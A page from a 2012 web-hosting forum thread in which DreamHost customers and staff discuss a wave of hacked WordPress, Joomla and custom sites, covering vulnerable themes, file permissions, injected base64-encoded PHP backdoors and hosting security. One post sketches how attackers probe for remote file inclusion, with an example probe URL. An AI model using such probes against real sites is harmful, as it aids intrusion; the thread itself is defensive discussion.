Current time: 04-24-2014, 09:24 AM Hello There, Guest! (LoginRegister)

Post Reply 
Sites hacked
03-01-2012, 02:46 PM
Post: #131
RE: Sites hacked
(03-01-2012 02:02 PM)labrocca Wrote:  I've set all my users to "Enhanced Security". I'm unsure why that's not default.
Historical reasons. It's on by default for new users now, and we will be retroactively turning it on in some cases as well.

(03-01-2012 02:02 PM)labrocca Wrote:  As I stated. It's not unusual to have a script require 777 for things like uploads.
This is actually not the case on our system — default permissions (755 for directories, 644 for files) will still allow uploads to work, as PHP scripts on our system run as the owner, not as the web server.

We've got a blog post in the works about this.

(03-01-2012 02:02 PM)labrocca Wrote:  So everyone in this thread with the exact same problem running on different accounts with different scripts all had backdoors? Yeah right. Maybe you're just not paying attention to what's going on here or maybe you've just not well versed on how things run.
I'm just listing off the most common causes of exploits that we've observed. I'm not trying to say that these are the only causes, simply that these are the most common.

We are taking steps to try to detect some of these situations proactively and notify customers when we notice something wrong — we aren't omniscient, though, and so we can't always catch problems before they are exploited.
Find all posts by this user
Quote this message in a reply
03-01-2012, 02:50 PM
Post: #132
RE: Sites hacked
(03-01-2012 06:44 AM)constantandtrue Wrote:  Bobocat, all of my sites did have Extra Security. My sites were on two users... not individual users. I moved them to individual users last night.

Ok, that's probably the key. If you had Wordpress running on both of those users and they both had a theme or plugin with an exploit, then that would explain the problem. You need to amend your initial claim because moving them to individual users after the fact has no bearing on the discussion.

Apparently, even unused themes can be exploited. So if you had an old theme with the infamous timthumb function, then it could have been exploited, a backdoor/shell placed in each users' account, then every file within that user subsequently modified.

Your description is completely possible without any flaw in DH's security.
Find all posts by this user
Quote this message in a reply
03-01-2012, 02:54 PM
Post: #133
RE: Sites hacked
(03-01-2012 02:44 PM)scubadollar Wrote:  So this script insertion file monitor you mentioned. Can you explain a bit more how this is carried out /implemented by the hacker as I am still a bit unclear as to how my sites were hacked. As I mentioned I have ruled out the wordpress and Joomla holes / failures, my user passwords are secure and support swears up and down that no one had access to my ftp/shell account as a result of security breaches.

OK, so what happens is certain PHP programs have bugs which allow hackers to insert code into their operation. They probe actual PHP programs on your site by trying things like /wp-content/themes/myobscuretheme/index.php?=http:google.com if they actually see a result through index.php that points them to google, they know that this php code actually executes the commands it's given under certain circumstances. Then they can insert code via a helpful php command that's hidden from view because the've encoded it using a php function called base64_encode.

The typical hack is to get a file monitor bootstrapped this way, then they can replace the underlying code, actually any code they want with hacked code. If you have not enabled enhanced security, they can access with impurity the rest of your dream host account.

Since wordpress and Joomla and most everything else if open sourced, these trolls can down load the source and look for weaknesses. When weaknesses are recognized by wordpress and others, updates are produced to patch the hole, so if a troll probes you and figures out what version of what your running they can tailor the attack to your SPECIFIC installation.
Find all posts by this user
Quote this message in a reply
03-01-2012, 02:54 PM
Post: #134
RE: Sites hacked
(03-01-2012 07:07 AM)p2ranger Wrote:  I also got hacked. I am using Concrete 5, its up to its latest update according to the panel. The only thing I added to concrete 5 was something that allows you to play MP3 files. Other than that its a out of the box concrete 5 site. I also noticed that lots of comments got added to my Gallery site.

Can't say I'm real happy about all this

Just because an app is up to date does not mean that it's bullet-proof. Although most popular apps are quick to plug vulnerabilities, the time taken to issue an update is not instantaneous. There may well be an unpatched exploit in concrete5 or the 'something that allows you to play MP3 files'.
Find all posts by this user
Quote this message in a reply
03-01-2012, 02:57 PM
Post: #135
RE: Sites hacked
(03-01-2012 02:31 PM)kelly7552 Wrote:  I'm planning on asking some friends to help blog innovative ways to 'harden' wordpress on dreamhost on this site repairitblog.org. PM me if you'd like to contribute as an author.

After you get through DreamHost & WordPress, it would be interesting to see other software distributions and other hosts.

Could be tremendously beneficial to the internet as a whole.
Find all posts by this user
Quote this message in a reply
03-01-2012, 02:58 PM
Post: #136
RE: Sites hacked
1. Keep your software up to date.

2. Don't 777.

3. ENHANCED SECURITY


I learnt the hard way and got caught by all three and found a lot of silly old stuff lurking around my sites / domains / users that would have caught up with me sooner or later. Shit - I had some php4.2 users running.

Shitting on Dreamhost here isnt going to help. Unless we hear otherwise I'm assuming some group / botnet etc wandered into dreamhost hosting space, found 1000's of vulnerable sites all grouped together and let rip.
Find all posts by this user
Quote this message in a reply
03-01-2012, 03:01 PM
Post: #137
RE: Sites hacked
(03-01-2012 09:25 AM)hgonzal Wrote:  I'm pretty sure it didn't have the base64_decode() function, but rather the hex-escape secuence...

Damn. I would have liked to have seen that alternate hex coded file.

If anyone here has a site that is still "hacked" or has backups of a site before running any awk, sed, grep, or cleaner scripts could you PM me as I'd like to check out that file.
Possible name : style.php - filesize : 21675 Bytes.


(03-01-2012 09:25 AM)hgonzal Wrote:  I followed its logic, after two unscamble steps it produces the following php:

Yep, that's the shell that can be POST'd to I mentioned previously.


(03-01-2012 01:18 PM)hgonzal Wrote:  Perhaps there is some pattern here?
(03-01-2012 11:18 AM)labrocca Wrote:  fyi I have a few WP...

^ This.


For the past several months standalones and botnets have been systematically tasting EVERY Wordpress and J! site that is listed in Google. Webhost1 WP users ground to a halt. Webhost2 WP users ground to a halt. Webhost3 WP users ground to a halt. One by one they all fell down. There is the pattern. Now it's arrived here -and after it's done it will move on to the next ones on the list.

The attack is against known exploits, most of which do not succeed here. The ones that do work (everywhere) are because of the plugins and themes used that are poorly coded and thus create security holes in an otherwise sane codebase. Unfortunately it would appear that at least one theme or plugin that is installed by default during the One-Click process was exploitable.

Note that this is not restricted to "free plugins" or "free themes". A very highly regarded Joomla! Extension business (professional, costly extensions) had to recently rewrite a sizeable percentage of it's Pay-Only components because they were all being exploited during this latest wave of attacks. Call it 0day if you want (it certainly isn't) but the injectors were all over it well before the "professionals".


Also, every one is a guru on teh_interwebs \m/

Wink

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost
Visit this user's website Find all posts by this user
Quote this message in a reply
03-01-2012, 03:13 PM (This post was last modified: 03-01-2012 03:15 PM by bobocat.)
Post: #138
RE: Sites hacked
(03-01-2012 01:13 PM)labrocca Wrote:  Most were 5.2 with extra security. I will also be disabling some php functions like fsockopen.

What a mess DH. I can't decide which disappoints me more. Their lack of response or their lack of security.

While I agree with the disappointing response time / usefulness of some responses, some of the onus must be born by you by your own omission that only some users were running with extra security. Unless you can show that the exploit crossed that boundary, then DH can not be held accountable.

DH provides a hosting service, not a software service. We choose the software, usually with a no guarantees license. If you choose to run the software in a userspace which is not secured from other users, then an exploit in one can lead to damage in the other.

That being said, DH should probably do more than just set the most secure option as default. Anything that decreases security, including automatically setting up ftp and phpmyadmin entry points, should only be done after sufficiently warning the users of the costs and benefits of such a decision rather than as just another option to pick when setting up hosting. All of these options ought to be flagged consistently as potentially decreasing security. An extreme might even be to put all of these options into a separate grouping in the panel and labelling it as decreased security or something like that.


(03-01-2012 11:18 AM)labrocca Wrote:  I can confirm that and I was on php 5.2.

But in a later post you wrote that some had enhanced web security....
Find all posts by this user
Quote this message in a reply
03-01-2012, 03:17 PM
Post: #139
RE: Sites hacked
(03-01-2012 02:54 PM)kelly7552 Wrote:  OK, so what happens is certain PHP programs have bugs which allow hackers to insert code into their operation. They probe actual PHP programs on your site by trying things like /wp-content/themes/myobscuretheme/index.php?=http:google.com if they actually see a result through index.php that points them to google, they know that this php code actually executes the commands it's given under certain circumstances. Then they can insert code via a helpful php command that's hidden from view because the've encoded it using a php function called base64_encode.

The typical hack is to get a file monitor bootstrapped this way, then they can replace the underlying code, actually any code they want with hacked code. If you have not enabled enhanced security, they can access with impurity the rest of your dream host account.

Since wordpress and Joomla and most everything else if open sourced, these trolls can down load the source and look for weaknesses. When weaknesses are recognized by wordpress and others, updates are produced to patch the hole, so if a troll probes you and figures out what version of what your running they can tailor the attack to your SPECIFIC installation.

Thanks Bill,

this is understood, it is why popular themes and plugins need to be updated when these weaknesses are found but it is still in the realm of "your Wordpress or Joomla install is insecure" In my experience, hackers do not do this to custom sites unless they are very popular, there is an obvious exploitable hole or there is some info to gain. Of course some times they are just bored but there is no evidence that this was a bored persons attack.

I have a site running that was completely custom built and uses no recognizable file structure, no third party plugins, no third party scripts at all. It is not even remotely similar to Wordpress or Joomla or any other open source system out there in file structure or coding. It is on an individual user account with enhanced security and one week ago I was forced to download the site and clean out the same hacks.

So basically I am now led to believe that some guy in the ukraine just has it in for me and spent whatever time it took to individually seek out and exploit my custom site which garners about 80 hits a month, hardly a target worth the effort.

I am still leaning toward the security on the servers themselves being the real issue here. Either these hacks are jumping from user to user through security holes or there are some deeper security issues.

Still looking for the right answers
Find all posts by this user
Quote this message in a reply
03-01-2012, 03:20 PM (This post was last modified: 03-01-2012 03:22 PM by amphibious.)
Post: #140
RE: Sites hacked
(03-01-2012 02:58 PM)eggybobeggles Wrote:  Shitting on Dreamhost here isnt going to help. Unless we hear otherwise I'm assuming some group / botnet etc wandered into dreamhost hosting space, found 1000's of vulnerable sites all grouped together and let rip.

They have a security breach in January and it doesn't seem like any sensitive data was taken... yet they take precautions, do the right thing, and force a password reset.

Good decision...

In mid-February, all of a sudden, potentially thousands of sites that they host start forwarding to people to porn/malware sites. They do nothing, give callous answers to their users looking for help, and do not provide their paying customers a clear path to remove the crap and secure their sites. Additionally, they don't seem to be providing their paying customers any notification to alert them that there may be an issue.

Bad decision...

I think that's absolutely deserving of "shitting on DreamHost" for.

How difficult would it be to send out another mass email with explicit instructions on what's going on and how to fix it?
Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump: